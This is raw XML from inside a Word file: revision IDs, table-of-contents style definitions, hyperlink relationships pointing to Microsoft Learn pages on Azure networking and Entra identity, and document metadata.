    <w:rsid w:val="0073568C"/>
    <w:rsid w:val="00736B0E"/>
    <w:rsid w:val="007371B0"/>
    <w:rsid w:val="00741C12"/>
    <w:rsid w:val="00744A93"/>
    <w:rsid w:val="00751011"/>
    <w:rsid w:val="007531B3"/>
    <w:rsid w:val="00754563"/>
    <w:rsid w:val="00761750"/>
    <w:rsid w:val="00771EF8"/>
    <w:rsid w:val="00773C1C"/>
    <w:rsid w:val="007872E8"/>
    <w:rsid w:val="00790371"/>
    <w:rsid w:val="00790D60"/>
    <w:rsid w:val="00790D7D"/>
    <w:rsid w:val="0079318A"/>
    <w:rsid w:val="007937A2"/>
    <w:rsid w:val="0079540C"/>
    <w:rsid w:val="00796701"/>
    <w:rsid w:val="007A168D"/>
    <w:rsid w:val="007A3B61"/>
    <w:rsid w:val="007A4041"/>
    <w:rsid w:val="007A544F"/>
    <w:rsid w:val="007B3FFD"/>
    <w:rsid w:val="007B5FC1"/>
    <w:rsid w:val="007C1339"/>
    <w:rsid w:val="007C4C67"/>
    <w:rsid w:val="007C5D5C"/>
    <w:rsid w:val="007C732F"/>
    <w:rsid w:val="007D1B50"/>
    <w:rsid w:val="007D3914"/>
    <w:rsid w:val="007D3D92"/>
    <w:rsid w:val="007D3D99"/>
    <w:rsid w:val="007E1022"/>
    <w:rsid w:val="007E1A24"/>
    <w:rsid w:val="007F1CBE"/>
    <w:rsid w:val="007F2639"/>
    <w:rsid w:val="007F530F"/>
    <w:rsid w:val="007F5355"/>
    <w:rsid w:val="007F57DB"/>
    <w:rsid w:val="00816253"/>
    <w:rsid w:val="00823F01"/>
    <w:rsid w:val="0083059A"/>
    <w:rsid w:val="00830ED5"/>
    <w:rsid w:val="00831807"/>
    <w:rsid w:val="00833BE7"/>
    <w:rsid w:val="00833F75"/>
    <w:rsid w:val="00835088"/>
    <w:rsid w:val="00835190"/>
    <w:rsid w:val="00842AB2"/>
    <w:rsid w:val="008448D3"/>
    <w:rsid w:val="00844C45"/>
    <w:rsid w:val="00846148"/>
    <w:rsid w:val="00853A91"/>
    <w:rsid w:val="00860062"/>
    <w:rsid w:val="0086146A"/>
    <w:rsid w:val="0086774E"/>
    <w:rsid w:val="00871F9C"/>
    <w:rsid w:val="00875D4A"/>
    <w:rsid w:val="00877B90"/>
    <w:rsid w:val="00883EC6"/>
    <w:rsid w:val="008870BC"/>
    <w:rsid w:val="00892324"/>
    <w:rsid w:val="008A3C08"/>
    <w:rsid w:val="008A40DD"/>
    <w:rsid w:val="008A6111"/>
    <w:rsid w:val="008B0A05"/>
    <w:rsid w:val="008B2064"/>
    <w:rsid w:val="008B3725"/>
    <w:rsid w:val="008B6513"/>
    <w:rsid w:val="008C0F53"/>
    <w:rsid w:val="008C463A"/>
    <w:rsid w:val="008C49EC"/>
    <w:rsid w:val="008C74EB"/>
    <w:rsid w:val="008C7D31"/>
    <w:rsid w:val="008D3756"/>
    <w:rsid w:val="008D6543"/>
    <w:rsid w:val="008E5214"/>
    <w:rsid w:val="008F69EC"/>
    <w:rsid w:val="00901CAE"/>
    <w:rsid w:val="0090219B"/>
    <w:rsid w:val="009048E1"/>
    <w:rsid w:val="00922E38"/>
    <w:rsid w:val="00930B8A"/>
    <w:rsid w:val="00931F18"/>
    <w:rsid w:val="00932382"/>
    <w:rsid w:val="009356A3"/>
    <w:rsid w:val="00940216"/>
    <w:rsid w:val="009474BB"/>
    <w:rsid w:val="00950439"/>
    <w:rsid w:val="00951C3C"/>
    <w:rsid w:val="009607F6"/>
    <w:rsid w:val="0096565E"/>
    <w:rsid w:val="009702A7"/>
    <w:rsid w:val="00971DA7"/>
    <w:rsid w:val="009727D5"/>
    <w:rsid w:val="00976457"/>
    <w:rsid w:val="009815EB"/>
    <w:rsid w:val="009920C7"/>
    <w:rsid w:val="0099495A"/>
    <w:rsid w:val="00997142"/>
    <w:rsid w:val="00997288"/>
    <w:rsid w:val="009A1A24"/>
    <w:rsid w:val="009A2C12"/>
    <w:rsid w:val="009A7D01"/>
    <w:rsid w:val="009B0BBD"/>
    <w:rsid w:val="009B0BE6"/>
    <w:rsid w:val="009B29D5"/>
    <w:rsid w:val="009B38B0"/>
    <w:rsid w:val="009B7CEC"/>
    <w:rsid w:val="009C0B70"/>
    <w:rsid w:val="009C3A30"/>
    <w:rsid w:val="009D3882"/>
    <w:rsid w:val="009D3E48"/>
    <w:rsid w:val="009E0421"/>
    <w:rsid w:val="00A04309"/>
    <w:rsid w:val="00A118F0"/>
    <w:rsid w:val="00A226F7"/>
    <w:rsid w:val="00A25030"/>
    <w:rsid w:val="00A25C2C"/>
    <w:rsid w:val="00A3148C"/>
    <w:rsid w:val="00A358BE"/>
    <w:rsid w:val="00A369BE"/>
    <w:rsid w:val="00A41F34"/>
    <w:rsid w:val="00A43D97"/>
    <w:rsid w:val="00A4669A"/>
    <w:rsid w:val="00A5109D"/>
    <w:rsid w:val="00A51919"/>
    <w:rsid w:val="00A54228"/>
    <w:rsid w:val="00A56365"/>
    <w:rsid w:val="00A56F98"/>
    <w:rsid w:val="00A631CF"/>
    <w:rsid w:val="00A66B07"/>
    <w:rsid w:val="00A701DE"/>
    <w:rsid w:val="00A703F6"/>
    <w:rsid w:val="00A73663"/>
    <w:rsid w:val="00A75C93"/>
    <w:rsid w:val="00A91907"/>
    <w:rsid w:val="00A92251"/>
    <w:rsid w:val="00AA0171"/>
    <w:rsid w:val="00AA1221"/>
    <w:rsid w:val="00AA1827"/>
    <w:rsid w:val="00AA1FA6"/>
    <w:rsid w:val="00AA61B0"/>
    <w:rsid w:val="00AA7052"/>
    <w:rsid w:val="00AC323D"/>
    <w:rsid w:val="00AD49F2"/>
    <w:rsid w:val="00AE0408"/>
    <w:rsid w:val="00AE0BC7"/>
    <w:rsid w:val="00AE72FE"/>
    <w:rsid w:val="00AF4B41"/>
    <w:rsid w:val="00AF5AFE"/>
    <w:rsid w:val="00AF63DB"/>
    <w:rsid w:val="00AF6CFE"/>
    <w:rsid w:val="00B02F3D"/>
    <w:rsid w:val="00B0403B"/>
    <w:rsid w:val="00B04DA7"/>
    <w:rsid w:val="00B07444"/>
    <w:rsid w:val="00B123CA"/>
    <w:rsid w:val="00B31027"/>
    <w:rsid w:val="00B310D6"/>
    <w:rsid w:val="00B33538"/>
    <w:rsid w:val="00B3395A"/>
    <w:rsid w:val="00B3588D"/>
    <w:rsid w:val="00B42EB9"/>
    <w:rsid w:val="00B50F08"/>
    <w:rsid w:val="00B571CC"/>
    <w:rsid w:val="00B63114"/>
    <w:rsid w:val="00B63D66"/>
    <w:rsid w:val="00B667B2"/>
    <w:rsid w:val="00B66C38"/>
    <w:rsid w:val="00B67506"/>
    <w:rsid w:val="00B71BF0"/>
    <w:rsid w:val="00B71E03"/>
    <w:rsid w:val="00B7417F"/>
    <w:rsid w:val="00B83BFA"/>
    <w:rsid w:val="00B86A9F"/>
    <w:rsid w:val="00B9634E"/>
    <w:rsid w:val="00BA2E69"/>
    <w:rsid w:val="00BA39EE"/>
    <w:rsid w:val="00BB334D"/>
    <w:rsid w:val="00BB7DC9"/>
    <w:rsid w:val="00BB7EAC"/>
    <w:rsid w:val="00BC230A"/>
    <w:rsid w:val="00BC2EA7"/>
    <w:rsid w:val="00BC6158"/>
    <w:rsid w:val="00BC63FD"/>
    <w:rsid w:val="00BE522A"/>
    <w:rsid w:val="00BE666E"/>
    <w:rsid w:val="00BF2D76"/>
    <w:rsid w:val="00BF39C7"/>
    <w:rsid w:val="00BF4D3D"/>
    <w:rsid w:val="00BF64DD"/>
    <w:rsid w:val="00C06689"/>
    <w:rsid w:val="00C0713C"/>
    <w:rsid w:val="00C17637"/>
    <w:rsid w:val="00C21C55"/>
    <w:rsid w:val="00C314DD"/>
    <w:rsid w:val="00C36B28"/>
    <w:rsid w:val="00C36EA4"/>
    <w:rsid w:val="00C41D47"/>
    <w:rsid w:val="00C469AB"/>
    <w:rsid w:val="00C47351"/>
    <w:rsid w:val="00C504B3"/>
    <w:rsid w:val="00C52DAF"/>
    <w:rsid w:val="00C54739"/>
    <w:rsid w:val="00C62854"/>
    <w:rsid w:val="00C63047"/>
    <w:rsid w:val="00C644EE"/>
    <w:rsid w:val="00C64A8F"/>
    <w:rsid w:val="00C66EBD"/>
    <w:rsid w:val="00C70314"/>
    <w:rsid w:val="00C704FB"/>
    <w:rsid w:val="00C736D7"/>
    <w:rsid w:val="00C74D73"/>
    <w:rsid w:val="00C855F7"/>
    <w:rsid w:val="00C9210B"/>
    <w:rsid w:val="00C933C9"/>
    <w:rsid w:val="00C93534"/>
    <w:rsid w:val="00CA019C"/>
    <w:rsid w:val="00CA1BA0"/>
    <w:rsid w:val="00CA22D1"/>
    <w:rsid w:val="00CA2867"/>
    <w:rsid w:val="00CA303B"/>
    <w:rsid w:val="00CA4BB9"/>
    <w:rsid w:val="00CA7928"/>
    <w:rsid w:val="00CB27F3"/>
    <w:rsid w:val="00CB638C"/>
    <w:rsid w:val="00CC25E5"/>
    <w:rsid w:val="00CC5CE8"/>
    <w:rsid w:val="00CD1B2B"/>
    <w:rsid w:val="00CD29AE"/>
    <w:rsid w:val="00CD3C08"/>
    <w:rsid w:val="00CD43CB"/>
    <w:rsid w:val="00CD73C1"/>
    <w:rsid w:val="00CD7DBA"/>
    <w:rsid w:val="00CE6486"/>
    <w:rsid w:val="00CE68AC"/>
    <w:rsid w:val="00CF0AED"/>
    <w:rsid w:val="00CF2D95"/>
    <w:rsid w:val="00CF53A0"/>
    <w:rsid w:val="00D00263"/>
    <w:rsid w:val="00D05157"/>
    <w:rsid w:val="00D1094A"/>
    <w:rsid w:val="00D16728"/>
    <w:rsid w:val="00D27749"/>
    <w:rsid w:val="00D300A2"/>
    <w:rsid w:val="00D31546"/>
    <w:rsid w:val="00D3235D"/>
    <w:rsid w:val="00D32901"/>
    <w:rsid w:val="00D33208"/>
    <w:rsid w:val="00D34DC9"/>
    <w:rsid w:val="00D36761"/>
    <w:rsid w:val="00D40BE6"/>
    <w:rsid w:val="00D40C14"/>
    <w:rsid w:val="00D50663"/>
    <w:rsid w:val="00D53BEE"/>
    <w:rsid w:val="00D563AC"/>
    <w:rsid w:val="00D601CA"/>
    <w:rsid w:val="00D712C8"/>
    <w:rsid w:val="00D76C03"/>
    <w:rsid w:val="00D824EA"/>
    <w:rsid w:val="00D914B0"/>
    <w:rsid w:val="00D918AB"/>
    <w:rsid w:val="00D919B6"/>
    <w:rsid w:val="00D9595A"/>
    <w:rsid w:val="00D960A3"/>
    <w:rsid w:val="00DA4D58"/>
    <w:rsid w:val="00DB1127"/>
    <w:rsid w:val="00DB34D7"/>
    <w:rsid w:val="00DB623F"/>
    <w:rsid w:val="00DC2CC4"/>
    <w:rsid w:val="00DD0C11"/>
    <w:rsid w:val="00DD2377"/>
    <w:rsid w:val="00DD39C7"/>
    <w:rsid w:val="00DE1B90"/>
    <w:rsid w:val="00DE4558"/>
    <w:rsid w:val="00DE50B1"/>
    <w:rsid w:val="00DF7ED3"/>
    <w:rsid w:val="00E005E7"/>
    <w:rsid w:val="00E02617"/>
    <w:rsid w:val="00E030B5"/>
    <w:rsid w:val="00E05FF3"/>
    <w:rsid w:val="00E06AD0"/>
    <w:rsid w:val="00E13D85"/>
    <w:rsid w:val="00E14EE7"/>
    <w:rsid w:val="00E2500D"/>
    <w:rsid w:val="00E310AB"/>
    <w:rsid w:val="00E33307"/>
    <w:rsid w:val="00E41A4A"/>
    <w:rsid w:val="00E53977"/>
    <w:rsid w:val="00E547DC"/>
    <w:rsid w:val="00E64F30"/>
    <w:rsid w:val="00E71790"/>
    <w:rsid w:val="00E720FA"/>
    <w:rsid w:val="00E753AE"/>
    <w:rsid w:val="00E81CA9"/>
    <w:rsid w:val="00E81F50"/>
    <w:rsid w:val="00E829AF"/>
    <w:rsid w:val="00E96770"/>
    <w:rsid w:val="00EA10FD"/>
    <w:rsid w:val="00EA1275"/>
    <w:rsid w:val="00EA412E"/>
    <w:rsid w:val="00EA6627"/>
    <w:rsid w:val="00EB0CE7"/>
    <w:rsid w:val="00EB7E1B"/>
    <w:rsid w:val="00EC1304"/>
    <w:rsid w:val="00EC40F9"/>
    <w:rsid w:val="00EC686A"/>
    <w:rsid w:val="00ED04A7"/>
    <w:rsid w:val="00EE2BE9"/>
    <w:rsid w:val="00EE733B"/>
    <w:rsid w:val="00EF00E3"/>
    <w:rsid w:val="00EF1D99"/>
    <w:rsid w:val="00EF1FF4"/>
    <w:rsid w:val="00EF5293"/>
    <w:rsid w:val="00EF73B0"/>
    <w:rsid w:val="00F01589"/>
    <w:rsid w:val="00F20CC8"/>
    <w:rsid w:val="00F302F8"/>
    <w:rsid w:val="00F30848"/>
    <w:rsid w:val="00F3402E"/>
    <w:rsid w:val="00F411B1"/>
    <w:rsid w:val="00F42055"/>
    <w:rsid w:val="00F4302D"/>
    <w:rsid w:val="00F45482"/>
    <w:rsid w:val="00F46D9F"/>
    <w:rsid w:val="00F50029"/>
    <w:rsid w:val="00F52360"/>
    <w:rsid w:val="00F563AE"/>
    <w:rsid w:val="00F57225"/>
    <w:rsid w:val="00F62DE7"/>
    <w:rsid w:val="00F64BA8"/>
    <w:rsid w:val="00F707C5"/>
    <w:rsid w:val="00F72C33"/>
    <w:rsid w:val="00F77A46"/>
    <w:rsid w:val="00F82B92"/>
    <w:rsid w:val="00F82EB7"/>
    <w:rsid w:val="00F83A25"/>
    <w:rsid w:val="00F84C77"/>
    <w:rsid w:val="00F85C18"/>
    <w:rsid w:val="00F87C89"/>
    <w:rsid w:val="00FA19B4"/>
    <w:rsid w:val="00FA5DC3"/>
    <w:rsid w:val="00FA74C0"/>
    <w:rsid w:val="00FA7980"/>
    <w:rsid w:val="00FB339D"/>
    <w:rsid w:val="00FB3909"/>
    <w:rsid w:val="00FB6F6F"/>
    <w:rsid w:val="00FC0847"/>
    <w:rsid w:val="00FC4756"/>
    <w:rsid w:val="00FC57BF"/>
    <w:rsid w:val="00FD05A7"/>
    <w:rsid w:val="00FD084F"/>
    <w:rsid w:val="00FD39AD"/>
    <w:rsid w:val="00FD455C"/>
    <w:rsid w:val="00FD4D10"/>
    <w:rsid w:val="00FD6BAF"/>
    <w:rsid w:val="00FE1E41"/>
    <w:rsid w:val="00FE4F8E"/>
    <w:rsid w:val="00FF075C"/>
    <w:rsid w:val="00FF4E74"/>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 w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F50029"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A611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04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virtual-network/concepts-and-best-practices" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/private-link/availability" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/entra/fundamentals/create-new-tenant"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en-us/azure/private-link/private-endpoint-overview" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/entra/identity-platform/single-and-multi-tenant-apps" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-diagnostic-logs" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/intune/intune-service/protect/windows-he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network-watcher/vnet-flow-logs-overview" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concepts" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/virtual-network/tutorial-filter-network-traffic" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sync-whatis" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/virtual-network/virtual-network-manage-subnet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concept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2128</TotalTime>
  <Pages>231</Pages>
  <Words>62729</Words>
  <Characters>357559</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2979</Lines>
  <Paragraphs>838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511</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-05T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-09T12:02:00Z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